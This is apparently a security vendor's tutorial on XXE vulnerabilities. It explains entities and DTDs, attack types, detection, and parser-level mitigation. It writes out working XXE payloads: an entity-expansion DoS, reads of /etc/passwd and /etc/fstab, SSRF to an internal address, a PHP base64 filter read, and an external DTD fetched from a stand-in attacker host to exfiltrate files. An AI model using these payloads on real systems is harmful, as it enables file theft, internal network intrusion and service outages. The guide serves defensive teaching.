XML external entity (XXE)

What are XXE vulnerabilities?

XML external entity (XXE) vulnerabilities (also called XML external entity injections or XXE injections) happen if a web application or API accepts unsanitized XML data and its back-end XML parser is configured to allow external XML entity parsing. XXE vulnerabilities can let malicious hackers perform attacks such as server-side request forgery (SSRF), local file inclusion (LFI), directory traversal, remote code execution (RCE), network port scanning, and denial of service (DoS).


Severity: severe
Prevalence: discovered rarely
Scope: may appear in web apps and APIs that accept XML input
Technical impact: SSRF, LFI, RCE, DoS
Worst-case consequences: full system compromise
Quick fix: configure the XML parser to disallow XML external entities

Note that XXE vulnerabilities were first featured in the OWASP Top 10 list in 2017 and immediately made it to the A4 spot. In the OWASP Top 10 for 2022, they are grouped with security misconfigurations under A5.

How do XML external entity attacks work?

For XXE attacks to be possible, a web application or API needs to meet several specific requirements:

  • It must accept XML input from the user and parse it using a back-end XML parser
  • The XML parser must have XML external entities support enabled

To understand what makes this security vulnerability possible, we need to start with some XML basics.

How do web applications and APIs use XML?

Web applications and APIs often use the extensible markup language (XML) to communicate with one another and to accept structured data from users. Common use cases include:

  • Web services and APIs: Web services and APIs often transmit data between the client and the server using XML. This is especially common in the case of older web services that use the SOAP standard.
  • Content management systems: Some content management systems (CMS) allow users to upload content in XML format. Such import functionality could be there, for example, to import and convert blog posts from an older CMS or to process uploaded DOCX files or SVG images (both of which are XML documents).
  • E-commerce: Some e-commerce solutions exchange data with other systems using XML. For example, they may use XML documents to communicate with inventory management systems or payment gateways.

To provide such functionality, the web application or API uses a back-end XML parser – usually an imported library written in the same language as the application. Examples include SimpleXML for PHP, DocumentBuilder for Java, ElementTree for Python, XmlReader for .NET, or DomParser for JavaScript.

What are DTDs and XML entities?

Before an XML parser can process XML input, you need to declare the structure of valid input documents. Knowing this, the parser can determine whether the input data is a valid XML document of an expected type and then process its content. There are two formats for defining the document type: the more powerful and complex XML schema definitions (XSD) and the simpler, older document type definitions (DTD). DTDs are sometimes considered outdated (they are derived from SGML, the ancestor of XML), but are still used very often.

XML entities are placeholder parameters representing characters that are not easily typed or have special meaning. Entities are defined in a DTD using the <!ENTITY> element. To refer to a defined entity, you use its name preceded by an ampersand (&) and followed by a semicolon (;). You may be familiar with entities in HTML, for example, &amp; and &nbsp;.

One use for XML entities in DTDs is to incorporate external content or references into the DTD itself, or into documents that use the DTD. Such inclusions are called external XML entities (XXE). XXEs can be abused by malicious hackers to access local files, URLs on a local network, and more.

Types of XXE attacks

There are three basic types of XXE attacks: in-band XXE, out-of-band XXE, and blind XXE.

  • In an in-band XXE attack, the attacker sends the attack and receives a response through the same channel, for example, via a direct HTTP request and response.
  • In an OOB XXE attack, the vulnerable system sends the results of an attack to a different resource controlled by the attacker. For example, the attack may be performed using a direct request but cause the hacked web server to send a sensitive file to the attacker’s own web server.
  • In a blind XXE attack, the attacker does not receive any direct response or result following an attack. Instead, they observe the behavior of the vulnerable web application (for example, the error messages it generates) to determine whether the attack was successful and use this indirect feedback to exfiltrate information step-by-step.

In this guide, we will focus on in-band XXE attacks, but the techniques described here can also be used for OOB XXE and blind XXE attacks.

Examples of XXE attacks

XXE attacks are performed by defining malicious XML entities in user input that will be parsed by a back-end XML parser. Here is an example of a simple (non-malicious) XML external entity definition:

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "World">
]>
<foo>
  Hello &bar;
</foo>

Response:

HTTP/1.0 200 OK
Hello World

Example of an XXE DoS attack

XML external entity definitions can themselves contain other entity definitions. This allows an attacker to create a recursive structure of calls that requires very little input data but can produce a lot of output. Such output may be used to exhaust the XML processor memory and potentially even overload the web server. By extending the following example with even more entities, an attacker could easily create an entity so large that it would exhaust the memory of any XML parser that tried to process it, resulting in a denial of service.

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "World ">
  <!ENTITY t1 "&bar;&bar;">
  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
  Hello &t3;
</foo>

Response:

HTTP/1.0 200 OK
Hello World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World

Example of XXE local data exfiltration

XXE definitions may include URL schemes such as file: in entity values. As a result, an attacker can include a reference to a file in the local file system that is accessible from the web server. This could be, for example, a file such as /etc/passwd or one of the source code files of the web application. The results of such an attack are similar to a local file inclusion attack combined with directory traversal.

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "file:///etc/passwd">
]>
<foo>
  &xxe;
</foo>

Response:

HTTP/1.0 200 OK
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh 
(...)

Example of XXE-based SSRF

XXE definitions may also contain URLs that link to external resources. Since the request to the URL is made from the web application itself because that’s where the XML is parsed, this allows for server-side request forgery. The attacker can then access files on the local network as if located inside that network, thus bypassing protection such as firewalls.

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "http://192.168.0.1/secret.txt">
]>
<foo>
  &xxe;
</foo>

Response:

HTTP/1.0 200 OK
Content of the secret.txt file on the local network (behind the firewall)

Limitations and workarounds for exfiltrating XML data

There is one major limitation when using XXE to exfiltrate data. The entire response is parsed as XML, so if the exfiltrated data contains or even only resembles XML, it will also be parsed as XML. This can cause a parser error or scramble the exfiltrated data:

Request:

POST http://example.com/xml HTTP/1.1
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM
  "file:///etc/fstab"&gt;
]>
<foo>
  &bar;
</foo>

Response:

HTTP/1.0 500 Internal Server Error
File "file:///etc/fstab", line 3
lxml.etree.XMLSyntaxError: Specification mandate value for attribute system, line 3, column 15...

As a result, simple XXE attacks can only be used to obtain files or responses that are considered valid XML by the parser, meaning that you cannot use them to obtain binary files.

XML itself includes a workaround for this problem. There are legitimate cases when you may need to store XML special characters in XML files. For this purpose, XML provides CDATA (character data) tags that can contain any special characters:

<data><![CDATA[ < " ' & > characters are ok in here ]]></data>

Using parameter entities with CDATA

In addition to general entities, XML also supports parameter entities. Parameter entities are only used in document type definitions (DTDs).

A parameter entity starts with the % character. This character instructs the XML parser that a parameter entity is being defined, as opposed to a general entity. In the following non-malicious example, a parameter entity is used to define a general entity which is then called from the XML document.

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % paramEntity
  "<!ENTITY genEntity 'bar'>">
  %paramEntity;
]>
<data>&genEntity;</data>

Response:

HTTP/1.0 200 OK
bar

By combining parameter entities and CDATA tags, an attacker can create a malicious DTD hosted on bad.example.com/evil.dtd:

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM
  "http://bad.example.com/evil.dtd">
  %dtd;
  %all;
]>
<data>&fileContents;</data>

Attacker DTD (bad.example.com/evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents 
'%start;%file;%end;'>">

When an attacker sends the above XXE payload, the XML parser will first attempt to process the %dtd parameter entity by making a request to http://bad.example.com/evil.dtd. After the attacker’s DTD has been downloaded, the XML parser will load the %file parameter entity (from evil.dtd), which in this example points to /etc/fstab. Next, the parser wraps the contents of the file in CDATA tags defined using the %start and %end parameter entities. Finally, everything gets stored in yet another parameter entity called %all.

The heart of the trick is that %all actually defines a general entity called &fileContents that can be included as part of the response. The end result is the contents of the /etc/fstab file wrapped in CDATA tags.

Using PHP protocol wrappers

If the web application vulnerable to XXE is a PHP application, new attack vectors open up thanks to PHP protocol wrappers. PHP protocol wrappers are I/O streams that allow access to PHP input and output streams.

An attacker can use the PHP/filter protocol wrapper to Base64-encode the contents of a file. Since Base64 will always be treated as valid XML data, an attacker can simply encode files on the server and then decode them on the receiving end. Crucially, this method allows the attacker to steal binary files, too.

Request:

POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM
  "php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
  &bar;
</foo>

Response:

HTTP/1.0 200 OK
IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0gaW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3RlbT4gPG1vdW50IHBvaW50PiAgIDx0eXBlPiAgPG9wdGlvbnM+ICAgICAgIDxkdW1wPiAgPHBhc3M+DQoNCnByb2MgIC9wcm9jICBwcm9jICBkZWZhdWx0cyAgMCAgMA0KIyAvZGV2L3NkYTUNClVVSUQ9YmUzNWE3MDktYzc4Ny00MTk4LWE5MDMtZDVmZGM4MGFiMmY4ICAvICBleHQzICByZWxhdGltZSxlcnJvcnM9cmVtb3VudC1ybyAgMCAgMQ0KIyAvZGV2L3NkYTYNClVVSUQ9Y2VlMTVlY2EtNWIyZS00OGFkLTk3MzUtZWFlNWFjMTRiYzkwICBub25lICBzd2...

Potential consequences of an XXE attack

If the XML parser used by a web application supports XML external entities, attackers can use the techniques described above to abuse XXE definitions and perform a variety of attacks, including:

  • Denial of service: If the attacker creates XXEs that recursively include one another, they can perform a DoS attack called the billion laughs attack. This attack causes the XML parser to run out of memory and may cause the web server to stop responding. The same can happen if the XXE points to a large file or a stream from the server, for example, /dev/urandom on Linux.
  • Port scanning: If the attacker creates XXEs that attempt to connect to a specific port on a machine within the local network, the host responses may allow them to determine whether that port is open or not. By repeating this process for multiple ports, attackers can perform port scans behind a firewall.
  • Local file inclusion and directory traversal: If the attacker creates an XXE that points to a local file on the server, they can read sensitive data from local files, which would be equivalent to performing an LFI with path traversal. For example, they could read the /etc/passwd file on Linux systems.
  • Server-side request forgery: If the attacker creates an XXE that points to a URL, they can perform an SSRF attack. Since the URL is accessed by the web application itself, the request will be seen as coming from the application, not the user. This may allow attackers to access systems protected by firewalls and whitelists.
  • Remote code execution (RCE): In rare cases, for example, when using the PHP/expect wrapper, it is possible to perform remote code execution through XXE, as demonstrated by Airman.

How to detect XXE vulnerabilities?

The best way to detect XXE vulnerabilities depends on whether they are already known or unknown.

  • If you only use commercial or open-source software and do not develop software of your own, you may find it enough to identify the exact version of the system or application that you are using. If the identified version has an XXE vulnerability, you can assume that you are susceptible to that vulnerability. You can identify the version manually or use a suitable security tool, such as software composition analysis (SCA) software in the case of web applications or a network scanner in the case of networked systems and applications.
  • If you develop your own software or want to potentially find unknown XXE vulnerabilities (zero-days) in known applications, you must be able to successfully exploit the XXE vulnerability to be certain that it exists. In such cases, you need to either perform manual penetration testing with the help of security researchers or penetration testers, or use an application security testing tool (web vulnerability scanner) that can automatically exploit vulnerabilities. Examples of such tools are Invicti and Acunetix by Invicti. We recommend using this method even for known vulnerabilities.

How to prevent XXE vulnerabilities in web applications?

Since XXE is considered a type of XML injection attack, some sources will simply recommend input validation and sanitization of XML documents through filtering and escaping to prevent potentially harmful content from being interpreted as XML. This also includes creating whitelists and blacklists for XML content. However, we do not recommend this approach since, due to the way that XML input is used by most applications, it is not practical to apply manual sanitization and validation.

A large part of XML communication between web applications and APIs (as well as communication with users) involves passing complete XML documents, so filtering and escaping all content in such documents is very troublesome and, unless done properly, can make the entire document invalid. Following OWASP documentation, we recommend that instead of trying to prevent XXE in specific applications, developers and web server administrators should work together to implement general mitigation guidelines by disallowing XML external entities on the level of the XML parser, not the web application.

How to mitigate XXE attacks?

The only effective way to mitigate XXE attacks is to completely prevent developers from using XML external entities in XML content coming from untrusted sources. OWASP additionally recommends completely disabling the processing of external document type definitions and restricting developers only to static, local DTDs. If the functionality of your web application depends on the use of external DTDs, you can prevent XXE attacks by disabling support for external entities in external DTDs.

To learn how to disable DTD and XXE processing in your specific XML parser, refer to the relevant OWASP XXE prevention cheat sheet, which contains instructions for many commonly used programming languages and XML parsers.

Frequently asked questions

What are XML external entity (XXE) vulnerabilities?

XXE vulnerabilities are caused by the permissive configuration of XML parsers. XML parsers used by web servers often allow the use of XML entities from external sources. Attackers may abuse this feature and use XML external entities to include malicious content or access sensitive information.

 

Read more about out-of-band XXE.

How dangerous are XXE vulnerabilities?

External XML entities may allow an attacker to access confidential information as well as perform server-side request forgery (SSRF) attacks. In some cases, XXE may even enable port scanning or lead to remote code execution.

 

Read more about SSRF vulnerabilities.

How to prevent XXE vulnerabilities?

The best way to prevent XXE vulnerabilities is to completely disable support for document type definitions (DTDs) in your XML parser. If this is not possible, you need to at least disable support for external entities and external document type declarations for your parser.

 

Learn how to disable external entities and external document type declarations for your language and parser.

ClassificationID
CAPEC201
CWE611
WASC43
OWASP 2021A5

Related blog posts


Written by: Tomasz Andrzej Nidecki, reviewed by: Benjamin Daniel Mussler